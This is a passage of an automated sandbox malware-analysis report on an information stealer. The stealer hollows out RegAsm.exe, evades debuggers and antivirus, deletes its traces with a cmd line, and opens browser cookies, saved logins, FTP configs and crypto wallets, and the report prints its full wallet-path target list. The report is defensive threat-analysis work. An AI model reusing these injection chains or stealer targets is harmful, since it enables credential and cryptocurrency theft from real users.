                          Source: EGDGIE.3.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                          Source: EGDGIE.3.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                          Source: EGDGIE.3.drBinary or memory string: outlook.office.comVMware20,11696487552s
                          Source: EGDGIE.3.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
                          Source: EGDGIE.3.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                          Source: EGDGIE.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                          Source: EGDGIE.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                          Source: EGDGIE.3.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_3-86877
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_3-86893
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_3-88208
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00446170 LdrInitializeThunk,10_2_00446170
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0041D016
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00418950
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004014AD mov eax, dword ptr fs:[00000030h]3_2_004014AD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040148A mov eax, dword ptr fs:[00000030h]3_2_0040148A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004014A2 mov eax, dword ptr fs:[00000030h]3_2_004014A2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00418599 mov eax, dword ptr fs:[00000030h]3_2_00418599
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041859A mov eax, dword ptr fs:[00000030h]3_2_0041859A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040884C CopyFileA,GetProcessHeap,RtlAllocateHeap,StrCmpCA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,DeleteFileA,3_2_0040884C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0041D016
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0041D98C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042762E SetUnhandledExceptionFilter,3_2_0042762E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C63B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6C63B66C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C63B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C63B1F7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7EAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C7EAC62
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 5888, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6880, type: MEMORYSTR
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_03192139 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_03192139
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_004124A8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_0041257F
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: FA8008Jump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44B000Jump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44E000Jump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45E000Jump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7AF008Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\ECBKKKFHCF.exe "C:\ProgramData\ECBKKKFHCF.exe" Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IJJKKJJDAAAA" & exitJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040111D cpuid 3_2_0040111D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,3_2_00410DDB
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_0042B0CC
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,3_2_0042B1C1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_00429A50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,3_2_0042B268
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,3_2_0042B2C3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,3_2_0042AB40
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,3_2_004253E3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,3_2_0042B494
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,3_2_0042749C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesA,3_2_0042B556
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_00429D6E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,3_2_0042E56F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_00427576
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_00428DC4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_0042B5E7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_0042B580
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,3_2_0042B623
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,3_2_0042E6A4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeQueries volume information: C:\ProgramData\ECBKKKFHCF.exe VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041C0E9 lstrcpyA,GetLocalTime,SystemTimeToFileTime,3_2_0041C0E9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,3_2_00410C53
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,3_2_00410D2E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: RegAsm.exe, 00000003.00000002.2803671443.000000000123A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                          Stealing of Sensitive Information

                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 0.2.file.exe.4195570.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.4195570.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.2144562432.0000000004195000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 5888, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6880, type: MEMORYSTR
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: \ElectronCash\wallets\
                          Source: RegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: window-state.json
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: \Exodus\
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: info.seco
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: passphrase.json
                          Source: RegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: Exodus
                          Source: RegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: Ethereum
                          Source: RegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: MultiDoge
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: seed.seco
                          Source: RegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: keystore
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
